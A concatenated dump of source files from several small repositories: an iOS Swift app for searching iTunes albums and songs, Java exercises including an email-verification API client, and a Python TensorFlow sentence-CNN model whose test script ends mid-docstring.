// Created by <NAME> on 30.12.2020.
//
import UIKit
protocol SearchResultsViewControllerDelegate: class {
func searchResults(didSelect album: Album)
}
final class SearchResultsViewController: UIViewController {
// MARK: - Public Properties
var presenter: SearchResultsPresenterProtocol?
weak var delegate: SearchResultsViewControllerDelegate?
// MARK: - Private Properties
private lazy var collectionView: UICollectionView = {
let layout = UICollectionViewFlowLayout()
layout.minimumLineSpacing = 16
layout.minimumInteritemSpacing = 16
layout.sectionInset = UIEdgeInsets(top: 16, left: 16, bottom: 16, right: 16)
let collectionView = UICollectionView(frame: .zero, collectionViewLayout: layout)
collectionView.register(AlbumCollectionViewCell.self, forCellWithReuseIdentifier: AlbumCollectionViewCell.identifier)
collectionView.keyboardDismissMode = .onDrag
collectionView.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
collectionView.backgroundColor = .systemBackground
} else {
collectionView.backgroundColor = .white
}
collectionView.dataSource = presenter as? UICollectionViewDataSource
collectionView.delegate = presenter as? UICollectionViewDelegate
return collectionView
}()
// MARK: - UIViewController Events
override func viewDidLoad() {
super.viewDidLoad()
configureVisualAppearance()
configureViews()
}
}
// MARK: - Visual Appearance
extension SearchResultsViewController {
// Groups all methods that are configuring the view’s visual appearance.
private func configureVisualAppearance() {
configureColors()
}
// Configures colors.
private func configureColors() {
// Setting up .systemBackground for the view's backgroundColor
// to support dark theme in iOS 13 or newer
if #available(iOS 13.0, *) {
self.view.backgroundColor = .systemBackground
} else {
self.view.backgroundColor = .white
}
self.view.tintColor = .systemPink
}
}
// MARK: - Layout
extension SearchResultsViewController {
// Groups all methods that are configuring the view.
private func configureViews() {
configureCollectionView()
}
// Configures a collection view.
private func configureCollectionView() {
self.view.addSubview(collectionView)
// Setting up constraints
collectionView.horizontalToSuperview(usingSafeArea: true)
collectionView.verticalToSuperview(usingSafeArea: true)
}
}
// MARK: - SearchResultsPresenter Delegate
extension SearchResultsViewController: SearchResultsViewProtocol {
// Reloads data in the collection view.
func shouldReloadData() {
DispatchQueue.main.async { [weak self] in
self?.collectionView.reloadData()
}
}
// Tells the delegate that user did select an item in the search results.
func shouldPresent(album: Album) {
delegate?.searchResults(didSelect: album)
}
}
<file_sep>//
// Song.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import Foundation
struct Song: ParsableModel {
// MARK: - Properties
let name: String
// MARK: - Initializers
init?(data: Dictionary<String, Any>) {
guard let name = data["trackCensoredName"] as? String else { return nil }
self.name = name
}
}
<file_sep>//
// DataProvider.swift
// iTunes Finder
//
// Created by <NAME> on 27.12.2020.
//
import Foundation
import SwiftyJSON
final class DataProvider {
// MARK: - Types
typealias AlbumsCompletionBlock = (Result<Array<Album>, Error>) -> Void
typealias SongsCompletionBlock = (Result<Array<Song>, Error>) -> Void
// MARK: - Public Properties
static let shared = DataProvider()
// MARK: - Private Properties
private let networkManager = NetworkManager()
// MARK: - Public Methods
// Requests albums from iTunes for a given search query.
func get(albumsWithName albumName: String, completion: @escaping AlbumsCompletionBlock) {
let url = "https://itunes.apple.com/search?&term=\(albumName)&entity=album"
networkManager.request(endpoint: url) { [weak self] data, error in
if let data = data, let albums = self?.parse(data: data, ofType: Album.self) {
completion(.success(albums))
} else if let error = error {
completion(.failure(error))
}
}
}
// Requests a list of songs of album.
func get(songsWithAlbumId albumId: String, completion: @escaping SongsCompletionBlock) {
let url = "https://itunes.apple.com/lookup?id=\(albumId)&entity=song"
networkManager.request(endpoint: url) { [weak self] data, error in
if let data = data, let songs = self?.parse(data: data, ofType: Song.self) {
completion(.success(songs))
} else if let error = error {
completion(.failure(error))
}
}
}
// MARK: - Private Methods
// Parses a data into an array of data with type.
private func parse<T: ParsableModel>(data: Data, ofType: T.Type) -> [T]? {
guard let json = try? JSON(data: data), let results = json["results"].arrayObject else { return nil }
var parsedData = [T]()
for data in results {
if let data = data as? Dictionary<String, Any>, let parsedItem = T(data: data) {
parsedData.append(parsedItem)
}
}
return parsedData
}
}
<file_sep>//
// SearchPresenter.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
protocol SearchViewProtocol: class {}
protocol SearchPresenterProtocol {
init(view: SearchViewProtocol, router: SearchRouterProtocol)
func moveToSearchDetail(with album: Album)
}
final class SearchPresenter: NSObject, SearchPresenterProtocol {
// MARK: - Properties
private weak var view: SearchViewProtocol?
private let router: SearchRouterProtocol
// MARK: - Initializers
init(view: SearchViewProtocol, router: SearchRouterProtocol) {
self.view = view
self.router = router
}
// MARK: - Methods
// Moves to the SearchDetail module.
func moveToSearchDetail(with album: Album) {
router.moveToSearchDetail(with: album)
}
}
<file_sep>//
// Throttler.swift
// iTunes Finder
//
// Created by <NAME> on 31.12.2020.
//
import Foundation
final class Throttler {
// MARK: - Types
typealias ThrottleBlock = () -> Void
// MARK: - Properties
private var workItem = DispatchWorkItem(block: {})
private var previousWorkItemRun = Date.distantPast
private let queue: DispatchQueue
private let delay: TimeInterval
// MARK: - Initializers
init(delay: TimeInterval, queue: DispatchQueue = .main) {
self.delay = delay
self.queue = queue
}
// MARK: - Methods
func throttle(_ block: @escaping ThrottleBlock) {
// Cancel any existing work item if it has not yet executed.
workItem.cancel()
// Re-assign work item with the new block, resetting
// the previous run time when it executes.
workItem = DispatchWorkItem() { [weak self] in
self?.previousWorkItemRun = Date()
block()
}
// If the time since the previous run is more than the required delay
// then execute the work item immediately. Otherwise, delay the work item
// execution by the delay time.
let delayTime = previousWorkItemRun.timeIntervalSinceNow > delay ? 0 : delay
queue.asyncAfter(deadline: .now() + Double(delayTime), execute: workItem)
}
}
<file_sep>platform :ios, '12.0'
target 'iTunes Finder' do
use_frameworks!
pod 'TinyConstraints'
pod 'SwiftyJSON', '~> 4.0'
pod 'Nuke', '~> 9.0'
post_install do |installer|
installer.pods_project.targets.each do |target|
target.build_configurations.each do |config|
config.build_settings.delete 'IPHONEOS_DEPLOYMENT_TARGET'
end
end
end
end
<file_sep>//
// SearchResultsConfigurator.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
final class SearchResultsConfigurator {
static func configure() -> UIViewController {
let view = SearchResultsViewController()
let router = SearchResultsRouter(view: view)
let presenter = SearchResultsPresenter(view: view, router: router)
view.presenter = presenter
return view
}
static func configure(with query: String) -> UIViewController {
let view = SearchResultsViewController()
let router = SearchResultsRouter(view: view)
let presenter = SearchResultsPresenter(view: view, router: router, query: query)
view.presenter = presenter
view.navigationItem.title = query
return view
}
}
<file_sep>//
// SearchHistoryTableViewCell.swift
// iTunes Finder
//
// Created by <NAME> on 29.12.2020.
//
import UIKit
final class SearchHistoryTableViewCell: UITableViewCell, ConfigurableView {
// MARK: - Public Properties
static let identifier = "SearchHistoryTableViewCell"
// MARK: - Private Properties
private let queryLabel: UILabel = {
let queryLabel = UILabel()
queryLabel.font = UIFont.preferredFont(forTextStyle: .body)
queryLabel.numberOfLines = 1
queryLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
queryLabel.textColor = .label
} else {
queryLabel.textColor = .black
}
return queryLabel
}()
// MARK: - Initializers
override init(style: UITableViewCell.CellStyle, reuseIdentifier: String?) {
super.init(style: style, reuseIdentifier: reuseIdentifier)
configureViews()
}
required init?(coder: NSCoder) {
super.init(coder: coder)
configureViews()
}
// MARK: - Public Methods
// Configures a cell with data from a model.
func configure(with model: SearchItem) {
queryLabel.text = model.query
}
// MARK: - Layout
// Groups all methods that are configuring the view.
private func configureViews() {
configureQueryLabel()
}
// Configures a label.
private func configureQueryLabel() {
self.addSubview(queryLabel)
// Setting up constraints
queryLabel.centerYToSuperview()
queryLabel.horizontalToSuperview(insets: .horizontal(20))
}
}
<file_sep>//
// SearchHistoryRouter.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
protocol SearchHistoryRouterProtocol {
init(view: UIViewController)
func moveToSearchResults(with query: String)
func moveToSearchDetail(with album: Album)
}
final class SearchHistoryRouter: SearchHistoryRouterProtocol {
// MARK: - Properties
private weak var view: UIViewController?
// MARK: - Initializers
init(view: UIViewController) {
self.view = view
}
// MARK: - Methods
// Moves view to a SearchResults module.
func moveToSearchResults(with query: String) {
guard
let view = view as? SearchHistoryViewController,
let navigationController = view.navigationController,
let viewController = SearchResultsConfigurator.configure(with: query) as? SearchResultsViewController
else {
return
}
viewController.delegate = view
navigationController.pushViewController(viewController, animated: true)
}
// Moves view to a SearchDetail module.
func moveToSearchDetail(with album: Album) {
guard let view = view, let navigationController = view.navigationController else { return }
let viewController = SearchDetailConfigurator.configure(with: album)
navigationController.pushViewController(viewController, animated: true)
}
}
<file_sep>//
// CoreDataStack.swift
// iTunes Finder
//
// Created by <NAME> on 28.12.2020.
//
import CoreData
final class CoreDataStack {
// MARK: - Types
typealias ContextBlock = (NSManagedObjectContext) -> Void
// MARK: - Public Properties
static let shared = CoreDataStack()
// MARK: - Private Properties
private lazy var persistentContainer: NSPersistentContainer = {
let container = NSPersistentContainer(name: "Data")
container.loadPersistentStores { _, error in
if let error = error {
print("Unable to load Persistent Stores: \(error.localizedDescription)")
}
}
return container
}()
private lazy var backgroundContext: NSManagedObjectContext = {
let context = persistentContainer.newBackgroundContext()
context.mergePolicy = NSMergeByPropertyObjectTrumpMergePolicy
return context
}()
private(set) lazy var viewContext: NSManagedObjectContext = {
let context = persistentContainer.viewContext
context.automaticallyMergesChangesFromParent = true
context.mergePolicy = NSMergeByPropertyObjectTrumpMergePolicy
return context
}()
// MARK: - Methods
// Performs data saving in the background context.
func save(_ block: @escaping ContextBlock) {
let context = backgroundContext
context.perform {
block(context)
if context.hasChanges {
do {
try context.save()
} catch let error {
print("Unable to save context: \(error.localizedDescription)")
}
}
}
}
}
<file_sep>//
// SearchHistoryViewController.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
final class SearchHistoryViewController: UIViewController {
// MARK: - Public Properties
var presenter: SearchHistoryPresenterProtocol?
// MARK: - Private Properties
private lazy var tableView: UITableView = {
let tableView = UITableView()
tableView.register(SearchHistoryTableViewCell.self, forCellReuseIdentifier: SearchHistoryTableViewCell.identifier)
tableView.sectionHeaderHeight = 16
tableView.sectionFooterHeight = 16
if #available(iOS 13.0, *) {
tableView.backgroundColor = .systemBackground
} else {
tableView.backgroundColor = .white
}
tableView.dataSource = presenter as? UITableViewDataSource
tableView.delegate = presenter as? UITableViewDelegate
return tableView
}()
// MARK: - UIViewController Events
override func viewDidLoad() {
super.viewDidLoad()
configureVisualAppearance()
configureViews()
}
}
// MARK: - Visual Appearance
extension SearchHistoryViewController {
// Groups all methods that are configuring the view’s visual appearance.
private func configureVisualAppearance() {
configureColors()
configureNavigationTitle()
}
// Configures colors.
private func configureColors() {
// Setting up .systemBackground for the view's backgroundColor
// to support dark theme in iOS 13 or newer.
if #available(iOS 13.0, *) {
self.view.backgroundColor = .systemBackground
} else {
self.view.backgroundColor = .white
}
self.view.tintColor = .systemPink
}
// Configures a title in the navigation bar.
private func configureNavigationTitle() {
// Asking the navigation bar to display a title using a larger font if it possible
if let navigationController = self.navigationController {
navigationController.navigationBar.prefersLargeTitles = true
}
self.navigationItem.title = "History"
}
}
// MARK: - Layout
extension SearchHistoryViewController {
// Groups all methods that are configuring the view.
private func configureViews() {
configureTableView()
}
// Configures a table view to display search history.
private func configureTableView() {
self.view.addSubview(tableView)
// Setting up constraints
tableView.horizontalToSuperview()
tableView.verticalToSuperview(usingSafeArea: true)
}
}
// MARK: - SearchHistoryPresenter Delegate
extension SearchHistoryViewController: SearchHistoryViewProtocol {
// Prepares the table view for changes in it's content.
func tableView(shouldSetUpdates state: Bool) {
switch state {
case true:
tableView.beginUpdates()
case false:
tableView.endUpdates()
}
}
// Inserts rows in the table view.
func tableView(shouldInsertRowsAt indexPath: [IndexPath]) {
tableView.insertRows(at: indexPath, with: .automatic)
}
// Moves rows in the table view.
func tableView(shouldMoveRowAt indexPath: IndexPath, to newIndexPath: IndexPath) {
tableView.deleteRows(at: [indexPath], with: .automatic)
tableView.insertRows(at: [newIndexPath], with: .automatic)
}
// Reloads rows in the table view.
func tableView(shouldReloadRowsAt indexPath: [IndexPath]) {
tableView.reloadRows(at: indexPath, with: .automatic)
}
// Deletes rows in the table view.
func tableView(shouldDeleteRowsAt indexPath: [IndexPath]) {
tableView.deleteRows(at: indexPath, with: .automatic)
}
}
// MARK: - SearchResultsViewController Delegate
extension SearchHistoryViewController: SearchResultsViewControllerDelegate {
// Asks the presenter move to the SearchDetail module.
func searchResults(didSelect album: Album) {
presenter?.moveToSearchDetail(with: album)
}
}
<file_sep>//
// Album.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import Foundation
struct Album: ParsableModel {
// MARK: - Properties
let id: String
let name: String
let artistName: String
let price: String
let currency: String
let artworkUrl: String
let releaseDate: String
// MARK: - Initializers
init?(data: Dictionary<String, Any>) {
guard
let id = data["collectionId"] as? Int,
let name = data["collectionName"] as? String,
let artistName = data["artistName"] as? String,
let price = data["collectionPrice"] as? Double,
let currency = data["currency"] as? String,
let artworkUrl = data["artworkUrl100"] as? String,
let releaseDate = data["releaseDate"] as? String
else {
return nil
}
self.id = String(id)
self.name = name
self.artistName = artistName
self.price = String(price)
self.currency = currency
self.artworkUrl = artworkUrl
self.releaseDate = releaseDate
}
}
<file_sep>//
// SearchCollectionViewCell.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
import TinyConstraints
import Nuke
final class AlbumCollectionViewCell: UICollectionViewCell, ConfigurableView {
// MARK: - Public Properties
static let identifier = "AlbumCollectionViewCell"
// MARK: - Private Properties
private let artworkImageView: UIImageView = {
let artworkImageView = UIImageView()
artworkImageView.contentMode = .scaleAspectFit
artworkImageView.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
artworkImageView.backgroundColor = .systemGray6
} else {
artworkImageView.backgroundColor = UIColor(red: 0.95, green: 0.95, blue: 0.97, alpha: 1.00)
}
return artworkImageView
}()
private let activityIndicatorView: UIActivityIndicatorView = {
let activityIndicatorView = UIActivityIndicatorView()
activityIndicatorView.startAnimating()
activityIndicatorView.hidesWhenStopped = true
activityIndicatorView.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
activityIndicatorView.style = .medium
} else {
activityIndicatorView.style = .gray
}
return activityIndicatorView
}()
// MARK: - Initializers
override init(frame: CGRect) {
super.init(frame: frame)
configureViews()
}
required init?(coder: NSCoder) {
super.init(coder: coder)
configureViews()
}
// MARK: - UICollectionViewCell Methods
override func prepareForReuse() {
super.prepareForReuse()
// Resets properties before reusing it
self.artworkImageView.image = nil
self.activityIndicatorView.startAnimating()
}
// MARK: - Public Methods
// Configures a cell with data from a model.
func configure(with model: Album) {
// Loading an album artwork image
if let url = URL(string: model.artworkUrl) {
let options = ImageLoadingOptions(transition: .fadeIn(duration: 0.33))
Nuke.loadImage(with: url, options: options, into: artworkImageView) { [weak self] _ in
self?.activityIndicatorView.stopAnimating()
}
}
}
// MARK: - Layout
// Groups all methods that are configuring the view.
private func configureViews() {
configureArtworkImageView()
configureActivityIndicatorView()
}
// Configures an image view for an album artwork image.
private func configureArtworkImageView() {
self.contentView.addSubview(artworkImageView)
// Setting up constraints
artworkImageView.horizontalToSuperview()
artworkImageView.verticalToSuperview()
}
// Configures an activity indicator to display an image loading process.
private func configureActivityIndicatorView() {
self.contentView.addSubview(activityIndicatorView)
// Setting up constraints
activityIndicatorView.centerXToSuperview()
activityIndicatorView.centerYToSuperview()
}
}
<file_sep>//
// SearchDetailPresenter.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
protocol SearchDetailViewProtocol: class {
func shouldReloadData()
}
protocol SearchDetailPresenterProtocol {
init(view: SearchDetailViewProtocol, router: SearchDetailRouterProtocol, album: Album)
func fetchSongs()
}
final class SearchDetailPresenter: NSObject, SearchDetailPresenterProtocol {
// MARK: - Properties
private weak var view: SearchDetailViewProtocol?
private let router: SearchDetailRouterProtocol
private let album: Album
private var songs: Array<Song> = [] {
didSet {
view?.shouldReloadData()
}
}
// MARK: - Initializers
init(view: SearchDetailViewProtocol, router: SearchDetailRouterProtocol, album: Album) {
self.view = view
self.router = router
self.album = album
}
// MARK: - Methods
// Fetches a song list of the album.
func fetchSongs() {
DataProvider.shared.get(songsWithAlbumId: album.id) { [weak self] result in
switch result {
case .success(let songs):
// Setting the album's song list
self?.songs = songs
case .failure(let error):
// Presenting an error message if something went wrong
DispatchQueue.main.async {
self?.router.presentAlert(title: "Error", message: error.localizedDescription)
}
}
}
}
}
// MARK: - UITableView Data Source
extension SearchDetailPresenter: UITableViewDataSource {
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return songs.count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
guard let cell = tableView.dequeueReusableCell(withIdentifier: SongTableViewCell.identifier, for: indexPath) as? SongTableViewCell else { return UITableViewCell() }
let song = songs[indexPath.row]
cell.configure(with: song)
return cell
}
}
// MARK: - UITableView Delegate
extension SearchDetailPresenter: UITableViewDelegate {
func tableView(_ tableView: UITableView, heightForHeaderInSection section: Int) -> CGFloat {
return UITableView.automaticDimension
}
func tableView(_ tableView: UITableView, estimatedHeightForHeaderInSection section: Int) -> CGFloat {
return 320
}
func tableView(_ tableView: UITableView, viewForHeaderInSection section: Int) -> UIView? {
// Configures a header view to display detailed information about the album
guard let view = tableView.dequeueReusableHeaderFooterView(withIdentifier: AlbumTableViewHeader.identifier) as? AlbumTableViewHeader else { return UIView() }
view.configure(with: album)
return view
}
}
<file_sep>//
// NetworkManager.swift
// iTunes Finder
//
// Created by <NAME> on 27.12.2020.
//
import Foundation
final class NetworkManager {
// MARK: - Types
typealias CompletionBlock = (Data?, Error?) -> Void
// MARK: - Methods
// Loads data from network at specified URL.
func request(endpoint url: String, completion: @escaping CompletionBlock) {
guard let urlString = url.addingPercentEncoding(withAllowedCharacters: .urlQueryAllowed),
let url = URL(string: urlString) else { return }
let dataTask = URLSession.shared.dataTask(with: url) { data, _, error in
completion(data, error)
}
dataTask.resume()
}
}
<file_sep># iTunes Finder
|
73755955eae451450553c76cd26364435403e93f
|
[
"Swift",
"Ruby",
"Markdown"
] | 34 |
Swift
|
weakvar/iTunes-Finder
|
9ef0d454fb12822922af55249e994fa87e307795
|
27a2c3a0a6e86896f45b57b74a109a2c300b91bf
|
refs/heads/main
|
<repo_name>Steve0929/taylorbot<file_sep>/create.py
from tensorflow import keras
from tensorflow.keras import layers
import numpy as np
import random
import io
maxlen = 40
diversity = 1.0
#Prepare the data
with io.open("ts_songs.txt", encoding="utf-8") as f:
text = f.read().lower()
text = text.replace("\n", " ") # We remove newlines chars for nicer display
chars = sorted(list(set(text)))
char_indices = dict((c, i) for i, c in enumerate(chars))
indices_char = dict((i, c) for i, c in enumerate(chars))
total_chars = len(chars)
# Recrea exactamente el mismo modelo solo desde el archivo
model = keras.models.load_model('saved_model.h5')
def sample(preds, temperature=1.2):
# helper function to sample an index from a probability array
preds = np.asarray(preds).astype("float64")
preds = np.log(preds) / temperature
exp_preds = np.exp(preds)
preds = exp_preds / np.sum(exp_preds)
probas = np.random.multinomial(1, preds, 1)
return np.argmax(probas)
sentence = "i love the haters because im just gonna " #must be 40 chars long
generated = sentence
for i in range(400):
x_pred = np.zeros((1, maxlen, total_chars))
for t, char in enumerate(sentence):
x_pred[0, t, char_indices[char]] = 1.0
preds = model.predict(x_pred, verbose=0)[0]
next_index = sample(preds, diversity)
next_char = indices_char[next_index]
sentence = sentence[1:] + next_char
generated += next_char
print("...Generated: ", generated)
<file_sep>/README.md
# taylorbot
Taylor Swift lyrics generator
|
f1f0a39dd311d4da1d08899b0d89d285daddaa19
|
[
"Markdown",
"Python"
] | 2 |
Python
|
Steve0929/taylorbot
|
43aab38ca1c4d38084949e0462901406d46a8449
|
abddb505392ce24c41fd9cce0b2a881eae1bdaf7
|
refs/heads/master
|
<file_sep>//This code is written by <NAME>. The code elements duplicates from an array.
//For more query contact him <EMAIL> for your mean comments.
public class MainClass {
public static void main(String[] args) {
// TODO Auto-generated method stub
int [] a= {1,7,7,7,9,9,10,10,10,11,11,1};
removeduplicates(a);
}
public static void removeduplicates(int[]a)
{
int flag=0;
int b =0;
int k=0;
int [] temp = new int[a.length];
for(int i=0;i<a.length;i++)
{
int key = a[i];
for(int j=i+1;j<a.length;j++)
{
if(key==a[j])
{
flag++;
}
}
if(flag==0)
{
temp[k] = key;
k++;
}
else
{
for( int m=0;m<temp.length;m++)
{
if(key==temp[m])
{
b++;
}
}
if(b==0)
{
temp[k] = key;
k++;
}
}
b = 0;
}
for(int i=0;i<k;i++)
System.out.println(temp[i]);
}
}
<file_sep>import java.util.Hashtable;
public class MainClass {
public static void main(String[] args) {
// TODO Auto-generated method stub
Hashtable<Integer, String> hs= new Hashtable<Integer, String>();
hs.put(1, "Raaj");
hs.put(0, "Andy");
hs.put(2, "Mohsen");
System.out.println(hs);
hs.put(0, hs.get(0)+"Lee");
System.out.println(hs);
/*Average case complexity
//Hash table insertion time = 0(1)
//Hash table search time = 0(1)
//Hash table deletion time = 0(1)
*/
/*Worst case complexity
Hash table insertion time = 0(n)
Hash table search time = 0(n)
Hash table deletion time = 0(n)
*/
//Worst case space complexity is 0(n)
}
}
<file_sep>//This project is written by <NAME> and is licensed under Craftsilicon,Nairobi Kenya. The email verifier
//program helps to check the existence of an email id using the Third party API EmailVerfierApp(https://www.emailverifierapi.com/)
//Feel free to use and modify the code and contact <EMAIL>
package javaapplication2;
import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.ProtocolException;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Scanner;
/**
*
* @author user
*/
public class JavaApplication2 {
/**
* @param args the command line arguments
*/
public static void main(String[] args) throws ProtocolException, MalformedURLException, IOException {
// TODO code application logic here
Scanner input = new Scanner(System.in);
System.out.println("Enter the email id to validate");
String emailValidate = input.nextLine();
//String emailValidate = "<EMAIL>";
String apiKey = "<KEY>";
String serviceUri = "https://emailverifierapi.com/v2/";
String post_data = "apiKey=" + apiKey + "&email=" + emailValidate;
//sending a POSTrequest
URL obj = new URL(serviceUri);
HttpURLConnection con = (HttpURLConnection) obj.openConnection();
con.setRequestMethod("POST");
con.setDoOutput(true);
byte[] b = post_data.getBytes(StandardCharsets.US_ASCII);
con.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
con.setRequestProperty("Content-Length",Integer.toString(b.length));
try (DataOutputStream wr = new DataOutputStream(con.getOutputStream())) {
wr.write(b, 0, b.length);
}
StringBuilder response;
try (BufferedReader in = new BufferedReader(
new InputStreamReader(con.getInputStream()))) {
String inputLine;
response = new StringBuilder();
while ((inputLine = in.readLine()) != null) {
response.append(inputLine);
}
}
//print result
System.out.println(response.toString());
}
}
|
16918cec68c5e3f5519c7c35393e520b808fb202
|
[
"Java"
] | 3 |
Java
|
MindSparkTm/JavaDataStructuresHacks
|
811af3425972765d9a237a9fbbabf41938b7bcbc
|
6498b12151992876516b578844548b59d397ab4b
|
refs/heads/master
|
<file_sep>import tensorflow as tf
import numpy as np
class SentCNN(object):
"""
A CNN for utterance and relation pair matching regression.
Uses an embedding layer, convolutional layer, max-pooling layer,
and a logistic regression layer.
"""
def __init__(self,
sequence_length,
num_classes,
init_embeddings,
filter_sizes,
num_filters,
batch_size, # only need this for dropout layer
embeddings_trainable=False,
l2_reg_lambda=0.0):
"""
:param sequence_length: The length of our sentences. Here we always pad
our sentences to have the same length (depending on the longest sentences
in our dataset).
:param num_classes: Number of classes in the output layer.
:param init_embeddings: Pre-trained word embeddings or initialied values.
:filter_sizes: The number of words we want our convolutional filters to cover.
We will have num_filters for each size specified here. For example, [3, 4, 5]
means that we will have filters that slide over 3, 4 and 5 words respectively,
for a total of 3 * num_filters filters.
:num_filters: The number of filters per filter size (see above).
:embeddings_trainable: Train embeddings or not.
"""
# Placeholders for input, output and dropout
# input_x_u: batch_size x sequence_length
self.input_x_u = tf.placeholder(tf.int32,
[None, sequence_length],
name="input_x_u")
# input_x_r: batch_size x num_classes x sequence_length
self.input_x_r = tf.placeholder(tf.int32,
[None, num_classes, sequence_length],
name="input_x_r")
# input_y: batch_size,
self.input_y = tf.placeholder(tf.int64,
[None],
name="input_y")
self.dropout_keep_prob = tf.placeholder(tf.float32, name="dropout_keep_prob")
self.embedding_size = np.shape(init_embeddings)[1]
# Store the sequence_length used for the training, needed for test inference.
self.sequence_length = tf.Variable(sequence_length, trainable=False, dtype=tf.int32, name="sequence_length")
# Keeping track of l2 regularization loss (optional)
l2_loss = tf.constant(0.0)
# Embedding layer
with tf.name_scope("embedding"):
W = tf.Variable(init_embeddings,
trainable=embeddings_trainable,
dtype=tf.float32,
name='W')
# batch_size x sequence_length x embedding_size
self.embedded_u = tf.nn.embedding_lookup(W, self.input_x_u)
print("DEBUG: embedded_u -> %s" % self.embedded_u)
# batch_size x num_classes x sequence_length x embedding_size
self.embedded_r = tf.nn.embedding_lookup(W, self.input_x_r)
print("DEBUG: embedded_r -> %s" % self.embedded_r)
# Create a convolution + maxpooling layer for each filter size
pooled_outputs_u = []
pooled_outputs_r = []
for i, filter_size in enumerate(filter_sizes):
with tf.name_scope("conv-maxpool-%s-u" % filter_size):
# Convolution layer
filter_shape = [filter_size, self.embedding_size, num_filters]
W = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='W')
b = tf.Variable(tf.constant(0.1, shape=[num_filters]), name='b')
l2_loss += tf.nn.l2_loss(W)
l2_loss += tf.nn.l2_loss(b)
conv_u1d = tf.nn.conv1d(
self.embedded_u,
W,
stride=1,
padding="VALID",
name="conv-u")
# Apply nonlinearity
h_u = tf.nn.sigmoid(tf.nn.bias_add(conv_u1d, b), name="activation-u")
# Maxpooling over outputs
pooled_u1d = tf.nn.pool(
h_u,
window_shape=[sequence_length - filter_size + 1],
pooling_type="MAX",
padding="VALID",
strides=[1],
name="pool-u")
pooled_outputs_u.append(pooled_u1d)
# Pass each element in x_r through the same layer
pooled_outputs_r_wclasses = []
for j in range(num_classes):
embedded_r_j = self.embedded_r[:, j, :, :]
conv_r_j = tf.nn.conv1d(
embedded_r_j,
W,
stride=1,
padding="VALID",
name="conv-r-%s" % j)
h_r_j = tf.nn.sigmoid(tf.nn.bias_add(conv_r_j, b), name="activation-r-%s" % j)
pooled_r_j = tf.nn.pool(
h_r_j,
window_shape=[sequence_length - filter_size + 1],
pooling_type="MAX",
strides=[1],
padding="VALID",
name="pool-r-%s" % j)
pooled_outputs_r_wclasses.append(pooled_r_j)
# out_tensor: batch_size x num_class x num_filters
out_tensor = tf.concat(axis=1, values=pooled_outputs_r_wclasses)
pooled_outputs_r.append(out_tensor)
# Combine all the pooled features
num_filters_total = num_filters * len(filter_sizes)
print("DEBUG: pooled_outputs_u -> %s" % pooled_outputs_u)
self.h_pool_u = tf.concat(axis=2, values=pooled_outputs_u)
print("DEBUG: h_pool_u -> %s" % self.h_pool_u)
# batch_size x 1 x num_filters_total
#self.h_pool_flat_u = tf.reshape(self.h_pool_u, [-1, 1, num_filters_total])
self.h_pool_flat_u = self.h_pool_u
print("DEBUG: h_pool_flat_u -> %s" % self.h_pool_flat_u)
print("DEBUG: pooled_outputs_r -> %s" % pooled_outputs_r)
self.h_pool_r = tf.concat(axis=2, values=pooled_outputs_r)
print("DEBUG: h_pool_r -> %s" % self.h_pool_r)
# h_pool_flat_r: batch_size x num_classes X num_filters_total
#self.h_pool_flat_r = tf.reshape(self.h_pool_r, [-1, num_classes, num_filters_total])
self.h_pool_flat_r = self.h_pool_r
print("DEBUG: h_pool_flat_r -> %s" % self.h_pool_flat_r)
# Add dropout layer to avoid overfitting
with tf.name_scope("dropout"):
self.h_features = tf.concat(axis=1, values=[self.h_pool_flat_u, self.h_pool_flat_r])
print("DEBUG: h_features -> %s" % self.h_features)
self.h_features_dropped = tf.nn.dropout(self.h_features,
self.dropout_keep_prob,
noise_shape=[tf.shape(self.h_pool_flat_r)[0], 1, num_filters_total])
self.h_dropped_u = self.h_features_dropped[:, :1, :]
self.h_dropped_r = self.h_features_dropped[:, 1:, :]
# cosine layer - final scores and predictions
with tf.name_scope("cosine_layer"):
self.dot = tf.reduce_sum(tf.multiply(self.h_dropped_u,
self.h_dropped_r), 2)
print("DEBUG: dot -> %s" % self.dot)
self.sqrt_u = tf.sqrt(tf.reduce_sum(self.h_dropped_u**2, 2))
print("DEBUG: sqrt_u -> %s" % self.sqrt_u)
self.sqrt_r = tf.sqrt(tf.reduce_sum(self.h_dropped_r**2, 2))
print("DEBUG: sqrt_r -> %s" % self.sqrt_r)
epsilon = 1e-5
self.cosine = tf.maximum(self.dot / (tf.maximum(self.sqrt_u * self.sqrt_r, epsilon)), epsilon)
print("DEBUG: cosine -> %s" % self.cosine)
self.predictions = tf.argmax(self.cosine, 1, name="predictions")
print("DEBUG: predictions -> %s" % self.predictions)
# softmax regression - loss and prediction
with tf.name_scope("loss"):
losses = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=100*self.cosine, labels=self.input_y)
self.loss = tf.reduce_mean(losses) + l2_reg_lambda * l2_loss
# Calculate Accuracy
with tf.name_scope("accuracy"):
correct_predictions = tf.equal(self.predictions, self.input_y)
self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, "float"), name="accuracy")<file_sep>import tensorflow as tf
import os
import sys
sys.path.append(os.path.normpath(os.path.join(os.path.abspath(__file__), "../../")))
import training.sent_cnn_model.config as config
import preprocessing.sent_cnn_data_helpers as dh
import numpy as np
def format_data_for_testing(job_post, titles, max_len=50):
"""
